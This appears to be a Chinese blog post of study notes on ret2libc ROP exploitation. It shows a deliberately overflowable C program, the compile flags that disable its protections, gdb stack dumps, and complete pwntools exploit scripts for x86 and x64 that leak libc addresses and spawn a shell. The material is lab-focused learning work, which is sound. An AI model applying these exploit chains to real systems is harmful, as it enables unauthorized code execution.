Pwn 学习 question_5 x64ROP编程

已于 2022-04-30 13:21:59 修改
阅读量518 收藏
点赞数
分类专栏: Pwn 文章标签: pwn
于 2022-04-30 13:21:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrTreebook/article/details/124511454
版权

Pwn 学习 question_5 x64ROP编程

1.源代码

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
int dofunc(){
    char b[8] = {};
    write(1,"input:",6);
    read(0,b,0x100);
    //printf(b);
    return 0;
}

int main(){
    dofunc();
    return 0;
}

2.编译

x86

gcc -m32 -fno-stack-protector -no-pie -o question_5_x86

x64

gcc -fno-stack-protector -no-pie -o question_5_x64

3.x86

3.1.确定溢出量

00:0000│ esp 0xffffd000 ◂— 0x0
01:0004│     0xffffd004 —▸ 0xffffd018 ◂— 'aaaabaaaacaaaa\n'
02:0008│     0xffffd008 ◂— 0x100
03:000c│     0xffffd00c —▸ 0x8049182 (dofunc+12) ◂— add    ebx, 0x2e7e
04:0010│     0xffffd010 ◂— 0x1
05:0014│     0xffffd014 —▸ 0xffffd0e4 —▸ 0xffffd2ba ◂— 0x6d6f682f ('/hom')
06:0018│ ecx 0xffffd018 ◂— 'aaaabaaaacaaaa\n'
07:001c│     0xffffd01c ◂— 'baaaacaaaa\n'
08:0020│     0xffffd020 ◂— 'acaaaa\n'
09:0024│     0xffffd024 ◂— 0xa6161 /* 'aa\n' */
0a:0028│ ebp 0xffffd028 —▸ 0xffffd038 ◂— 0x0
0b:002c│     0xffffd02c —▸ 0x80491e1 (main+21) ◂— mov    eax, 0
0c:0030│     0xffffd030 ◂— 0x1
0d:0034│     0xffffd034 —▸ 0x8049060 (_start) ◂— xor    ebp, ebp
  • 可以计算出溢出量应该是 5 * 4 = 20

3.2.布栈

  • 按照如下顺序安排溢出后的栈空间

3.2.1.第一次溢出

ebp
p32(write_sym)
p32(dofunc_addr)
p32(1)
p32(leak_func_got)
p32(4)

3.2.2.计算libc_base

  • 我们现在获取了write在动态链接后got表中的地址
  • 为了获取动态连接后的system的地址
  • 就要先计算动态连接后的libc_base地址
  • libc_base = write_addr - write_offset
  • libc_base = 泄露的write地址 - write在libc中的地址
  • system_addr = libc_base + system_offset

3.2.3.第二次溢出

ebp
p32(sys_addr)
p32(0xdeadbeef)
p32(bin_sh_addr)

  • 两次溢出以后即可控制程序获取sh

3.3.exp

from pwn import *
context(log_level='debug',arch='i386',os='linux') #这个可以决定flat函数自动补充的类型
io = process('./question_5_x86')

# gdb.attach(io)

elf = ELF('question_5_x86')
padding = 20

leak_func_got = elf.got['write']

func_addr = elf.symbols['dofunc']
write_sym = elf.symbols['write']
payload = flat([b'a'* padding, write_sym, func_addr, 1, leak_func_got, 4])  # 32位系统接收4位即可,使用flat函数构造payload

io.sendlineafter('input:',payload)


# 以下调用都是libc的,需要使用libc文件查看,所有的偏移都是基于libc版本

libc_file = './libc-2.33.so'
libc = ELF(libc_file)

write_addr = u32(io.recv(4)) # 解压
print('write_addr:',hex(write_addr))

write_offset = libc.symbols['write']  # libc也可用ELF函数打开
libc_addr = write_addr - write_offset
print('libc_addr:',hex(libc_addr))

system_offset = libc.symbols['system']
system_addr = libc_addr + system_offset
print('system_addr:',hex(system_addr))

bin_sh_offset = next(libc.search(b'/bin/sh'))  # 寻找字符串偏移的方式
bin_sh_addr = libc_addr + bin_sh_offset
print('bin_sh_addr:',hex(bin_sh_addr))

gdb.attach(io)

payload2 = flat([b'a' * padding, system_addr, 0xdeadbeef, bin_sh_addr])
io.sendlineafter('input:',payload2)

pause()
io.interactive()

4.x64

4.1.确定溢出量

00:0000│ rsp 0x7fffffffde30 ◂— 0x0
01:0008│ rsi 0x7fffffffde38 ◂— 0x6161616261616161 ('aaaabaaa')
02:0010│ rbp 0x7fffffffde40 —▸ 0x7fffffff0a61 ◂— 0x0
03:0018│     0x7fffffffde48 —▸ 0x40118a (main+14) ◂— mov    eax, 0
04:0020│     0x7fffffffde50 ◂— 0x0
  • 计算溢出量是 2 * 8 = 16

4.2.布栈

4.2.1.第一次布栈

rbp
p64(pop_rdi_ret)
p64(1)
p64(pop_rsi_r15_ret)
p64(leak_func_got)
p64(0xdeadbeef)
p64(write_sym)
p64(dofunc_addr)

4.2.2.计算偏移

  • 原理同x86

4.2.3.第二次布栈

rbp
p64(pop_rdi_ret)
p64(bin_sh_addr)
p64(system_addr)

4.3.exp

from pwn import *
context(log_level='debug',arch='amd64',os='linux')
io = process('./question_5_x64')

# gdb.attach(io)

elf = ELF('question_5_x64')
padding = 16
pop_rdi_ret = 0x00000000004011fb
pop_rsi_r15_ret = 0x00000000004011f9
leak_func_got = 0x404018

func_addr = elf.symbols['dofunc']
write_sym = elf.symbols['write']

payload = b'a'* padding + p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_r15_ret) + p64(leak_func_got) + p64(0xdeadbeef)
payload += p64(write_sym) + p64(func_addr)
io.sendlineafter('input:',payload)


# 以下调用都是libc的,需要使用libc文件查看,所有的偏移都是基于libc版本
write_addr = u64(io.recv(8).ljust(8,b'\x00'))  # 补全8位
print('write_addr:',hex(write_addr))

write_offset = 0x00000000000EE5F0
libc_addr = write_addr - write_offset
print('libc_addr:',hex(libc_addr))

system_offset = 0x0000000000049860
system_addr = libc_addr + system_offset
print('system_addr:',hex(system_addr))

bin_sh_offset = 0x0000000000198882
bin_sh_addr = libc_addr + bin_sh_offset
print('bin_sh_addr:',hex(bin_sh_addr))

gdb.attach(io)

payload2 = b'a'* padding + p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)
io.sendlineafter('input:',payload2)

pause()
io.interactive()
==Microsoft==
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
pwn入门教程--0x01(必备知识)
qq_39772215的博客
02-05 944
pwn入门教程–0x01(必备知识) • Binary Exploitation • Pwn即Binary Exploitation,就是利用二进制漏洞来达到控制程序的工作流程(Control Flow) • 其目的就在于获得程序的控制权从而来控制程序所在主机 • Binary Format 即二进制文件的格式,如下: • 在Linux上叫做ELF(Executable and Linking Format)文件 • 组成部分分为 ·rodata:read only data(只读数据) ·data:数据节
Pwn入门笔记(五)ROP
qq_33590156的博客
11-29 655
ROP32位的ROP64位的ROP 32位的ROP 这个在栈基础中提到过,此处写出是为了和64位的形成对比。通过在返回地址上写上函数PLT的地址来实现跳转到函数,调用函数时压入参数后会压入eip(返回地址),然后32位程序参数在栈上,所以结构如下图: 栈底-高地址-> c b a 实际调用函数中的返回地址eip dddd 原返回地址(r) system的plt表地址 原ebp (s) aaaa aaaaaaaaaaaaaaa… 栈顶-低地址-> …
pwn栈溢出2
最新发布
Innocence_0的博客
11-03 61
(英语:Return-Oriented Programming,缩写:ROP)是计算机安全中的一种,该技术允许攻击者在程序启用了安全保护技术(如堆栈不可执行)的情况下控制程序执行流,执行恶意代码。其核心思想是通过栈溢出等方式控制堆栈调用,以劫持程序控制流并执行针对性的机器语言指令序列(称为所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。F5反汇编checksec 查看信息计算padding查找gadgets。
20145328 《网络对抗技术》逆向及Bof基础实践
weixin_34358365的博客
03-01 145
20145328 《网络对抗技术》逆向及Bof基础实践 实践内容 本次实践的对象是一个名为pwn1的linux可执行文件。 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。 实践方法 利用foo函数的...
CTFWIKI-PWN-ret2libc
m0_64180167的博客
04-20 1060
一遍我们只能找到got表的泄露 我们要写入的话就要重新执行一下 所以等等通过把start的地址存入返回地址 让程序执行两次。puts函数的真实地址 和 通过LibcSearcher工具得到的偏移量 就可以计算出每个函数的基地址。这里有一个问题 为什么我们需要找到开始的地址 _start表示程序开始的地址。如果我们无法找到system的plt地址 那我们就无法调用system函数。不是地址不会变 是函数和puts真实地址的之间的链接是不会变的。所以我们只要使用puts函数的真实地址 求出他们之间的链接。
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
开发者或学习者可以通过分析 "PWN.c" 的源代码了解如何在 AVR 上配置 PWM 定时器,以及如何通过编程控制 PWM 输出。同时,结合 "www.pudn.com.txt" 文件,可以获取项目背景、使用教程或其他相关资源。另外,项目可能...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
PWN入门
247533的博客
02-19 637
pwn exp
pwn学习——ret2libc1
MrTreebook的博客
11-28 1265
pwn学习——ret2libc11.看一下程序的保护2.看一下main函数有没有溢出3.ROPgadget4.exp 1.看一下程序的保护 ➜ ret2libc1 checksec ret2libc1 Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 2.看一
Pwn基础学习1-[栈溢出]/篇2
m0_52343643的博客
03-29 2279
继上一篇的内容 题目3-ret2syscall 定义 控制程序执行系统调用 原理 不同于之前的 ret2text 和 ret2shellcode 题型,系统调用并不是执行程序中现有的代码或自己写进去的代码,其实就如其字面意思,系统调用就是我们让系统来调用一些函数,那么如何做到让系统来调用,需要满足以下几个条件: 某函数的系统调用号【系统调用号表】—— 放在寄存器 eax 需传入某函数的参数 —— 放在寄存器 ebx、ecx、edx 一个指令 —— int 0x80 int 0x80(软中断)
PWN工具之Pwntools
CYXMDTT的博客
03-25 3852
pwntools是一个Python库,用于编写和利用漏洞利用工具和exploit代码。该库提供了许多功能,包括远程连接、二进制文件解析、shellcode生成、ROP链构建、GDB集成等,使渗透测试人员和安全研究人员更容易编写和测试漏洞利用代码。它是CTF竞赛和漏洞利用开发中广泛使用的工具之一。安装pwntools有多种方法,其中最简单的方法是使用pip包管理器。可以按照以下步骤安装pwntools。1:确认你已安装Python和pip。如果你还没有安装,先安装Python和pip。
栈溢出的第一步进阶——ROP返回导向编程
XJJ的博客
05-01 724
前面两次栈溢出只是让我们学习原理,是最简单、最基本的栈溢出问题,一般的pwn题不会这么简单,溢出一次就可以到位。今天我们就做第一步进阶,正式进入ROP。 就我目前理解的ROP,就是要通过连续多次栈溢出,利用其原有的gadget(可以叫做代码片段),构造一次系统调用,调用execve()函数,就相当于获得了一个shell。首先我们要知道,系统调用的中断号是0x80,而execve的功能号是11,也就是16进制的0xb。所以在进行系统调用(即执行INT 80H这条语句)之前,我们先要构造出调用execve()
ROP的基本原理和实战教学,看这一篇就够了
QL_2023的博客
02-21 2001
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。通过上一篇文章栈溢出漏洞原理详解与利用,我们可以发现栈溢出的控制点是ret处,那么ROP的核心思想就是利用以ret结尾的指令序列把栈中的应该返回EIP的地址更改成我们需要的值,从而控制程序的执行流程。
pwn(三)
小明的小书包Ya
10-04 2396
pwn(三) 简单的溢出利用方法 程序没有开启任何保护 方法一:寻找程序中system的函数,再布局栈空间,最后成功调用system('/bin/sh') 方法二:将我们的shellcode写入bss段,然后用elf.bss()来获取bss段地址,从而程序流向到我们的shellcode 这里不用具体程序分析了,把payload分别写上 方法一:payload = 'a' * offset...
xctf攻防世界pwn基础题解(新手食用)
热门推荐
Spwpun的博客
05-01 2万+
文章目录CGFsb status:updating… CGFsb 前面的那一道get_shell的题算是做pwn题的一般流程:下载文件,ida查看代码,分析漏洞,利用漏洞写出exp,最常用的是用到python的pwntools,然后使用nc或者pwntools连接到虚拟场景实现漏洞攻击得到flag。 本题的思路基本一致,使用pwntools编写漏洞利用脚本,这里的漏洞是格式化字符串漏洞,文章分...
pwn学习-基本ROP
WocW的博客
03-03 1924
CTF-WIKI-pwn-基本ROP 漏洞复现 ret2text 首先检查程序的保护机制。 关于各个保护机制的介绍 :https://www.cnblogs.com/Spider-spiders/p/8798628.html 看到只开启了NX保护,即不可在栈上执行代码。 使用IDA查看源码,可以看到这里有一个危险的gets函数 以及这里有一个system函数 所以如...
arm64 的 rop 实现
03-31
ROP(Return Oriented Programming)是一种攻击技术,通过在已有程序的可执行代码中找到一些已有的指令序列,然后通过构造栈帧和寄存器的值,将这些指令序列串联起来执行,以达到攻击的目的。 在ARM64架构中,ROP攻击的实现方式和x86架构类似,主要包括以下几个步骤: 1. 找到可用的指令序列:在程序的可执行代码中,找到一些已有的指令序列,这些指令序列可以实现ROP攻击的目的。 2. 构造栈帧:通过修改程序的栈帧,将ROP攻击所需要的参数和返回地址压入栈中。 3. 控制程序流程:通过修改程序的返回地址,将程序的控制流程跳转到已有的指令序列中,实现攻击的目的。 下面是一个简单的ARM64 ROP攻击的实现代码示例: ```c #include <stdio.h> #include <stdlib.h> #include <string.h> void vuln(char *buf) { char buf2[8]; strcpy(buf2, buf); printf("%s\n", buf2); } int main(int argc, char **argv) { char buf[8]; fgets(buf, 8, stdin); vuln(buf); return 0; } ``` 在这个示例程序中,存在一个栈溢出漏洞,在vuln函数中,将用户输入的字符串复制到了buf2数组中,如果输入的字符串长度超过了8个字节,就会发生栈溢出。 下面是一个简单的ROP攻击实现代码: ```python from pwn import * # gadget # pop {x0, x1, x2, x3, x4, x5, x6, x7, x8, lr}; ret; pop_x0_to_x8_lr = p64(0x4000f8) # mov x0, x1; mov x1, x2; mov x2, x3; mov x3, x4; mov x4, x5; mov x5, x6; mov x6, x7; mov x7, x8; blr x13; mov_x0_to_x8_blr_x13 = p64(0x400108) # system函数的地址 system_addr = p64(0x7ffff7a52370) # bin/sh字符串的地址 bin_sh_addr = p64(0x7ffff7b99e18) # 构造ROP链 rop = b'' rop += pop_x0_to_x8_lr rop += bin_sh_addr rop += p64(0x0) * 7 rop += system_addr # 构造payload payload = b'A' * 8 payload += rop # 发送payload p = process('./vuln') p.sendline(payload) p.interactive() ``` 在这个示例中,我们首先找到了两个gadget:一个用于将参数压入寄存器中,另一个用于调用system函数。然后通过系统函数的地址和/bin/sh字符串的地址,构造了一个ROP链,将其作为输入,发送给目标程序,实现了一个简单的ROP攻击。 需要注意的是,由于ARM64架构中的指令是64位的,因此在构造ROP链时需要使用64位的地址和指令。另外,在实现ROP攻击时,还需要考虑栈保护和ASLR等安全机制的影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值